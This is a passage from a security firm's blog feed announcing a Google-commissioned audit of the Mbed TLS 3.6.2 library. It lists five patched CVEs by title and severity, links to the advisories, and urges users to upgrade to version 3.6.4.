excited to share the results of a deep-dive security audit into <a href="https://github.com/Mbed-TLS/mbedtls">Mbed TLS</a> version 3.6.2, conducted in close collaboration with Google.</p><p>Mbed TLS is a C library that implements cryptographic primitives, X.509 certificate manipulation, and the SSL/TLS and DTLS protocols. Its small code footprint makes it suitable for embedded systems.</p><p>As part of its ongoing commitment to securing the Internet's foundational software, the Google Security Team commissioned Calif to proactively identify and fix potential vulnerabilities in this widely used open-source crypto library.</p><p>The assessment identified five vulnerabilities: one 'High' severity and four 'Medium' severity. All findings were disclosed to the Mbed TLS team in April 2025. We worked with the Mbed TLS developers to ensure all vulnerabilities were understood, prioritized, and patched effectively. We're pleased to report that all identified issues have been addressed.</p><h3><strong>Vulnerabilities Addressed</strong></h3><p>Here is a list of the key vulnerabilities found during the assessment, along with links to the official Mbed TLS advisories and their assigned CVE numbers.</p><ul><li><p>(High) Misleading memory management in X.509 name parsing leading to arbitrary code execution</p><ul><li><p>CVE-2025-47917 | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-7/">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium) Unchecked return value in LMS verification allows signature bypass</p><ul><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49600">CVE-2025-49600</a> | <a href="https://github.com/Mbed-TLS/mbedtls-docs/blob/main/security-advisories/mbedtls-security-advisory-2025-06-3.md">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium) Null pointer dereference in parsing X.509 distinguished names leading to DoS</p><ul><li><p>CVE-2025-48965 | <a 
href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-6/">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium) Out-of-bounds read in LMS public key import leading to DoS or information disclosure</p><ul><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49601">CVE-2025-49601</a> | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-4/">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium) Integer underflow in decoding PEM keys leading to DoS</p><ul><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-52497">CVE-2025-52497</a> | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-2/">Mbed TLS Advisory</a></p></li></ul></li></ul><h3><strong>Take Action and Dig Deeper</strong></h3><p>Thanks to this proactive initiative, the Mbed TLS library is now more secure. We strongly urge all users to upgrade to <strong>version 3.6.4</strong> or later.</p><p>This project is a powerful example of how targeted investment from companies like Google can directly improve the security of foundational software we all rely on.</p><ul><li><p>For a complete technical breakdown of each vulnerability, you can access the full report on our GitHub: <strong><a href="https://github.com/califio/publications/blob/main/security-audits/mbed-tls-3.6.2/Mbed-TLS-3.6.2-Security-Audit-Report.pdf">Read the Mbed TLS 3.6.2 Security Audit Report (PDF)</a></strong></p></li><li><p>To help the community, the custom <strong><a href="https://github.com/califio/publications/tree/main/security-audits/mbed-tls-3.6.2/wycheproof">Wycheproof test drivers</a></strong> we developed are publicly available for download. We encourage you to integrate them into your own testing pipelines.</p></li></ul>]]></content:encoded></item></channel></rss>